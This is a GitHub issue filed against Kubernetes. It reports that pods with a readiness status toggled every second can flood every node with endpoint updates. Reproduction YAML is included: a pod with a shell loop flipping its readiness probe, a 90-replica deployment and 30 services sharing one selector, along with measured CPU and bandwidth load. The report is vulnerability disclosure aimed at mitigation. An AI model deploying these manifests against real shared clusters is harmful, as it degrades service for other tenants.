### ISSUE TITLE
Pods status changes on one worker node can be lerveraged to make flooding attack to all other nodes in the kubernetes cluster

### ISSUE THREAD

**Issue by younaman** [kubernetes/kubernetes#110596]
### What happened?

In a Kubernetes cluster, each node has its Kube-proxy and kubelet components. For Kube-proxy, it will watch the modification of service/endpoints informed by API-server, and update local iptables; For Kubelet, it will send messages to Kube-apiserver when local pods' status change. 

So, when a pod status related to a service/endpoints has changed on a worker node, **the worker node's kubelet** will send messages to the **Kube-apiserver on the control plane**, while the Kube-apiserver received the pod's status change, it will update the status of the related endpoint in etcd, and **push related endpoint changes message to all other nodes' Kube-proxy**, all other nodes' Kube-proxy will modify its local iptables. 

As a result, a malicious user's service can change its pods status, trigger the Kube-apiserver push endpoint changes to all other nodes, making processes (iptables, calico, etc.) on other nodes consume CPU/memory resources, making flooding attack.

### What did you expect to happen?

We have reported a similar DoS issue to Kubernetes hackone.com, however, HackerOne said that: "all Denial-of-Service findings are out-of-scope". So I try to write my issue on GitHub and I want to know that:
1. Is it a real issue?

2. If it is a real issue, are there any ways to defend against this problem fundamentally?

3. As far as I am concerned, the problem is intrinsic to Kubernetes Kube-proxy design, if it is a real issue, does Kubernetes plan to mitigate this issue at least?

### How can we reproduce it (as minimally and precisely as possible)?

1. Deploy 10 malicious pods on one worker node, the template pod.yaml just like this:
```
apiVersion: v1
kind: Pod
metadata:
  name: test-readiness-1
  namespace: nginx-test
  labels:
    app: nginx-1
spec:
  nodeName: younaman-thinkpad
  containers:
  - name: nginx
    image: nginx
    args:
    - /bin/sh
    - -c
    - while true;do touch /tmp/healthy;sleep 1;rm -rf /tmp/healthy;sleep 1;done
    readinessProbe:
      exec:
        command:
        - cat
        - /tmp/healthy
      initialDelaySeconds: 1
      periodSeconds: 1
      failureThreshold: 1
      timeoutSeconds: 1
      successThreshold: 1
    imagePullPolicy: IfNotPresent
    ports:
    - containerPort: 80
```
These 10 pods are all on younaman-thinkpad worker node, and try to change the pod's ready status per second.
2. Deploy **one** deployment that has 90 pods, all these 90 pods, and the former 10 pods both have label: nginx-1
```
apiVersion: apps/v1
kind: Deployment
metadata:
  namespace: nginx-test
  name: nginx-normal-deployment
spec:
  selector:
    matchLabels:
      app: nginx-1
  replicas: 90
  template:
    metadata:
      labels:
        app: nginx-1
    spec:
      nodeName: younaman-thinkpad
      restartPolicy: Always
      containers:
      - name: nginx
        image: nginx
        imagePullPolicy: IfNotPresent
        ports:
        - containerPort: 80
```
3. Deploy 30 services, each of them corresponding to the former nginx-1 pods group, in other words, I leverage 30 services to create 30 endpoints.
```
apiVersion: v1
kind: Service
metadata:
  namespace: nginx-test
  name: nginx-service-1
spec:
  selector:
    app: nginx-1
  ports:
  - protocol: TCP
    port: 80
    targetPort: 80

apiVersion: v1
kind: Service
metadata:
  namespace: nginx-test
  name: nginx-service-2
spec:
  selector:
    app: nginx-1
  ports:
  - protocol: TCP
    port: 80
    targetPort: 80
...
```

On our local testbed,(1 master, 2 worker node, each has 4 core CPU and 8GB memory), by doing like this,  on the control plane node, the api-server/etcd/calico etc. processes will consume 60% CPU resources, on the other worker nodes, the calico/kube-proxy/iptables etc. processes will consume 20% CPU, and the incoming network bandwidth on other worker nodes is 1M/s. All these mean a flooding attack.

### Kubernetes version

<details>

```console
$ kubectl version
Client Version: version.Info{Major:"1", Minor:"21", GitVersion:"v1.21.1", GitCommit:"5e58841cce77d4bc13713ad2b91fa0d961e69192", GitTreeState:"clean", BuildDate:"2021-05-12T14:18:45Z", GoVersion:"go1.16.4", Compiler:"gc", Platform:"linux/amd64"}
Server Version: version.Info{Major:"1", Minor:"21", GitVersion:"v1.21.1", GitCommit:"5e58841cce77d4bc13713ad2b91fa0d961e69192", GitTreeState:"clean", BuildDate:"2021-05-12T14:12:29Z", GoVersion:"go1.16.4", Compiler:"gc", Platform:"linux/amd64"}
```

</details>

### Cloud provider

<details>

</details>

### OS version

<details>

```console
# On Linux:
$ cat /etc/os-release
# paste output here
$ uname -a
# paste output here

# On Windows:
C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture
# paste output here
```

</details>

### Install tools

<details>

</details>

### Container runtime (CRI) and version (if applicable)

<details>

</details>

### Related plugins (CNI, CSI, ...) and versions (if applicable)

<details>

</details>
